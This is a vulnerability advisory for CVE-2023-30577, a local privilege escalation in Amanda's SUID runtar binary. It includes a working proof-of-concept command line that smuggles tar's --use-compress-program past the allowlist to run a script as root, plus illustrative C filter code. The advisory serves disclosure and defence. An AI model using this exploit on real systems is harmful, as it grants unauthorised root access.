Summary
To exploit this vulnerability one must have access to the unprivileged backup user and be able to craft arguments to the SUID runtar binary.
Details
The SUID binary "runtar" can be made to accept potentially malicious GNU tar options if it is fed a non-argument option whose name starts with "--exclude" (say --exclude-vcs). The option that follows it is then accepted as "good", and it can be an option that passes a script or binary which tar will execute with root permissions.
The problematic code is located in the client-src/runtar.c file. The patch is available on request.
I've registered CVE-2023-30577 at MITRE for this vulnerability.
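As an added illustration of the allowlist mistake described above (hypothetical code written for this note, not the real client-src/runtar.c): a naive filter that prefix-matches "--exclude" and assumes the next argv element is its value, beside a version that matches option names exactly and consumes a value only for options known to take one. The option table is an assumption for the demonstration; it is not the project's real allowlist.

```c
#include <stdbool.h>
#include <string.h>

/* Hypothetical filter illustrating the advisory's bug class; NOT the real
 * client-src/runtar.c code. A lax prefix match on "--exclude" treats the
 * valueless --exclude-vcs as taking a value, shielding whatever follows. */

/* Naive filter: anything beginning with "--exclude" is assumed to take a
 * value, so the element after it is skipped instead of being inspected. */
bool filter_naive(int argc, char **argv) {
    static const char *allowed[] = {"--create", "--file", NULL};
    for (int i = 0; i < argc; i++) {
        const char *a = argv[i];
        if (a[0] != '-') continue;               /* a path, not an option */
        if (strncmp(a, "--exclude", 9) == 0) {   /* prefix match: the flaw */
            i++;                                 /* skip the "value" */
            continue;
        }
        bool ok = false;
        for (const char **p = allowed; *p; p++)
            if (strcmp(a, *p) == 0) { ok = true; break; }
        if (!ok) return false;                   /* unknown option: reject */
        if (strcmp(a, "--file") == 0) i++;       /* --file takes a value */
    }
    return true;
}

/* Fixed filter: option names are matched exactly, and only options known
 * to take a value consume the next element; everything else is inspected. */
bool filter_fixed(int argc, char **argv) {
    static const struct { const char *name; bool takes_value; } table[] = {
        {"--create", false}, {"--file", true},
        {"--exclude", true}, {"--exclude-vcs", false},
    };
    for (int i = 0; i < argc; i++) {
        const char *a = argv[i];
        if (a[0] != '-') continue;
        bool ok = false;
        for (size_t k = 0; k < sizeof table / sizeof table[0]; k++) {
            if (strcmp(a, table[k].name) == 0) {
                ok = true;
                if (table[k].takes_value) i++;
                break;
            }
        }
        if (!ok) return false;
    }
    return true;
}
```

Fed the argument vector from the PoC below, the naive filter accepts --use-compress-program because --exclude-vcs "consumed" it, while the fixed filter rejects it as an unknown option.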
PoC
$ whoami
backup
$ ls -l /usr/local/libexec/amanda/runtar
-rwsr-x--- 1 root backup 25984 Apr 14 12:01 /usr/local/libexec/amanda/runtar
$ cat /tmp/poc-id.sh
#!/bin/sh
whoami > /tmp/poc-id.out
chmod 666 /tmp/poc-id.out
$ /usr/local/libexec/amanda/runtar NOCONFIG tar --create --file /dev/null --exclude-vcs --use-compress-program /tmp/poc-id.sh /dev/null
tar: Removing leading `/' from member names
$ cat /tmp/poc-id.out
root
Impact
Local privilege escalation.